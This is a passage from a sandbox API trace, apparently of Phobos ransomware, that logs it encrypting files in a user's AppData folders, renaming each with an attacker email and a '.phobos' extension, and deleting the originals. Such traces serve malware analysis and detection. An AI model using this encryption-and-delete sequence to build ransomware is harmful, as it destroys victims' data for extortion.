dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.497] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=21009) returned 1 [0192.497] CloseHandle (hObject=0x164) returned 1 [0192.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Yb0ESaRT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yb0esart.bmp")) returned 0x2020 [0192.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Yb0ESaRT.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yb0esart.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Yb0ESaRT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yb0esart.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.497] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.497] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Yb0ESaRT.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yb0esart.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.498] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.498] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.498] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5211, lpOverlapped=0x0) returned 1 [0192.499] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5220, dwBufLen=0x5220 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5220) returned 1 [0192.500] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5220, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5220, lpOverlapped=0x0) returned 1 [0192.501] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.501] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.501] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.501] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.501] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.501] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.501] CloseHandle (hObject=0x164) returned 1 [0192.501] CloseHandle (hObject=0x134) returned 1 [0192.501] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Yb0ESaRT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yb0esart.bmp")) returned 1 [0192.502] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YZGA0gxdErPgcpy.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yzga0gxderpgcpy.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.503] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=100131) returned 1 [0192.503] CloseHandle (hObject=0x134) returned 1 [0192.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YZGA0gxdErPgcpy.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yzga0gxderpgcpy.avi")) returned 0x2020 [0192.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YZGA0gxdErPgcpy.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yzga0gxderpgcpy.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YZGA0gxdErPgcpy.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yzga0gxderpgcpy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.503] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.503] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YZGA0gxdErPgcpy.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yzga0gxderpgcpy.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.504] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.504] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18723, lpOverlapped=0x0) returned 1 [0192.505] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18730, dwBufLen=0x18730 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18730) returned 1 [0192.506] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18730, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18730, lpOverlapped=0x0) returned 1 [0192.508] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.508] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.508] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.508] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.508] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0192.508] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.508] CloseHandle (hObject=0x134) returned 1 [0192.508] CloseHandle (hObject=0x164) returned 1 [0192.508] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YZGA0gxdErPgcpy.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yzga0gxderpgcpy.avi")) returned 1 [0192.510] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZQDB73.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zqdb73.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.510] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=99215) returned 1 [0192.510] CloseHandle (hObject=0x164) returned 1 [0192.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZQDB73.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zqdb73.gif")) returned 0x2020 [0192.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZQDB73.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zqdb73.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZQDB73.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zqdb73.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.511] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.511] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZQDB73.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zqdb73.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.673] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.673] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.673] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1838f, lpOverlapped=0x0) returned 1 [0192.674] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18390, dwBufLen=0x18390 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18390) returned 1 [0192.675] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18390, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18390, lpOverlapped=0x0) returned 1 [0192.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0192.677] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.677] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.677] CryptDestroyKey (hKey=0xa32be8) returned 1 [0192.677] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.677] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.677] CloseHandle (hObject=0x164) returned 1 [0192.677] CloseHandle (hObject=0x134) returned 1 [0192.677] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZQDB73.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zqdb73.gif")) returned 1 [0192.679] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.680] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=836) returned 1 [0192.680] CloseHandle (hObject=0x134) returned 1 [0192.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml")) returned 0x2020 [0192.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.680] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.680] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.681] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.681] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.681] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x344, lpOverlapped=0x0) returned 1 [0192.748] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x350, dwBufLen=0x350 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x350) returned 1 [0192.748] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x350, lpOverlapped=0x0) returned 1 [0192.749] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0192.749] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.749] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.749] CryptDestroyKey (hKey=0xa32be8) returned 1 [0192.749] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.749] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.749] CloseHandle (hObject=0x134) returned 1 [0192.749] CloseHandle (hObject=0x164) returned 1 [0192.749] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml")) returned 1 [0192.750] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-ErXgd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-erxgd.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.758] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11644) returned 1 [0192.758] CloseHandle (hObject=0x164) returned 1 [0192.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-ErXgd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-erxgd.bmp")) returned 0x2020 [0192.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-ErXgd.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-erxgd.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-ErXgd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-erxgd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.759] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.759] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-ErXgd.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-erxgd.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.760] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.760] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2d7c, lpOverlapped=0x0) returned 1 [0192.764] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d80, dwBufLen=0x2d80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d80) returned 1 [0192.764] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2d80, lpOverlapped=0x0) returned 1 [0192.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.768] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.768] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.768] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.768] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.768] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.768] CloseHandle (hObject=0x164) returned 1 [0192.768] CloseHandle (hObject=0x134) returned 1 [0192.768] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-ErXgd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-erxgd.bmp")) returned 1 [0192.770] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_HAXPP g-i-7iPCiO2e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_haxpp g-i-7ipcio2e.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.771] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=25086) returned 1 [0192.771] CloseHandle (hObject=0x134) returned 1 [0192.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_HAXPP g-i-7iPCiO2e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_haxpp g-i-7ipcio2e.flv")) returned 0x2020 [0192.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_HAXPP g-i-7iPCiO2e.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_haxpp g-i-7ipcio2e.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_HAXPP 